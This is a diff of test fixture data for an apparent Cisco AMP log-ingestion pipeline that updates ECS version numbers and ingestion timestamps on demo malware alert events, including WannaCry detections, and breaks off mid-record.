                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -2000,7 +2000,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2026,7 +2026,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854034528Z",
+                "ingested": "2021-09-13T18:07:55.452584295Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2079,7 +2079,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2099,7 +2099,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854036408Z",
+                "ingested": "2021-09-13T18:07:55.452586210Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2156,7 +2156,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2186,7 +2186,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854038307Z",
+                "ingested": "2021-09-13T18:07:55.452588141Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2239,7 +2239,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2259,7 +2259,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854040200Z",
+                "ingested": "2021-09-13T18:07:55.452590049Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2314,7 +2314,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2334,7 +2334,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854042089Z",
+                "ingested": "2021-09-13T18:07:55.452592053Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2389,7 +2389,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2409,7 +2409,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854043976Z",
+                "ingested": "2021-09-13T18:07:55.452593968Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2466,7 +2466,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2496,7 +2496,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854045878Z",
+                "ingested": "2021-09-13T18:07:55.452595861Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2549,7 +2549,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2569,7 +2569,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854047755Z",
+                "ingested": "2021-09-13T18:07:55.452597787Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2620,7 +2620,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2640,7 +2640,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854049645Z",
+                "ingested": "2021-09-13T18:07:55.452599647Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2693,7 +2693,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2723,7 +2723,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854051576Z",
+                "ingested": "2021-09-13T18:07:55.452601659Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2780,7 +2780,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2812,7 +2812,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854053426Z",
+                "ingested": "2021-09-13T18:07:55.452603555Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2865,7 +2865,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2885,7 +2885,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854055298Z",
+                "ingested": "2021-09-13T18:07:55.452605458Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2940,7 +2940,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2972,7 +2972,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854057182Z",
+                "ingested": "2021-09-13T18:07:55.452607341Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3029,7 +3029,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3061,7 +3061,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854059068Z",
+                "ingested": "2021-09-13T18:07:55.452609262Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3118,7 +3118,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3150,7 +3150,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854060930Z",
+                "ingested": "2021-09-13T18:07:55.452611169Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat 